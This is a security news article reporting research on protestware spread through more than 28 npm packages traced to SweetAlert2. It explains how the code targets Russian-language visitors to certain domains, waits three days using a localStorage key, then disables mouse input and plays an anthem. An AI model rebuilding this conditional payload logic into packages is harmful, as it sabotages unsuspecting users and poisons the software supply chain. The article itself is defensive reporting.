Threat Actors Weaponized 28+ New npm Packages to Infect Users With Protestware Scripts

A sophisticated protestware campaign has emerged targeting Russian-language users through a network of compromised npm packages, with threat actors weaponizing at least 28 new packages containing nearly 2,000 versions of malicious code.

The campaign represents a significant escalation in supply chain attacks, leveraging JavaScript package repositories to distribute politically motivated malware that disrupts user interactions on Russian and Belarusian websites.

The malware operates through a complex conditional framework that specifically targets users with Russian browser language settings visiting domains with .ru, .by, .su, and .рф extensions.

Upon meeting these criteria, the protestware disables all mouse-based interactions on affected websites and plays the Ukrainian national anthem on loop, effectively rendering the sites unusable for the targeted demographic.

Socket.dev analysts identified the widespread distribution of this protestware across multiple npm packages, tracing its origins to the popular SweetAlert2 library, which boasts over 700,000 weekly downloads.

The research team discovered that the malicious code has propagated through unintentional supply chain contamination, with developers unknowingly copying infected code from SweetAlert2 into their own packages without proper disclosure.

The campaign’s reach extends far beyond its initial vector, with affected packages ranging from UI component libraries to specialized development tools.

Many packages contain over 100,000 lines of code, with the malicious payload strategically buried deep within the codebase to avoid detection during routine code reviews.

Technical Implementation and Persistence Mechanisms

The protestware employs sophisticated persistence tactics to ensure long-term impact while avoiding immediate detection.

The malware utilizes browser localStorage to track user visits, implementing a three-day delay mechanism before payload activation.

This approach allows the malware to establish persistence without triggering immediate suspicion from users or automated security systems.

The core implementation relies on a multi-layered conditional check beginning with browser environment detection using typeof window !== 'undefined', followed by language detection through /^rub/.test(navigator. Language), and domain verification via location.host.match() for targeted domains.

Once conditions are satisfied and the three-day timer expires, the malware executes its payload by setting document.body.style.pointerEvents = 'none' to disable interactions while creating an audio element that loads the Ukrainian national anthem from an external server.

The persistence mechanism stores an initiation timestamp in localStorage using the key ‘swal-initiation’, calculating elapsed time since first visit to determine payload activation, ensuring repeat users experience the full protestware impact while minimizing collateral damage to casual visitors.

Boost detection, reduce alert fatigue, accelerate response; all with an interactive sandbox built for security teams -> Try ANY.RUN Now

The post Threat Actors Weaponized 28+ New npm Packages to Infect Users With Protestware Scripts appeared first on Cyber Security News.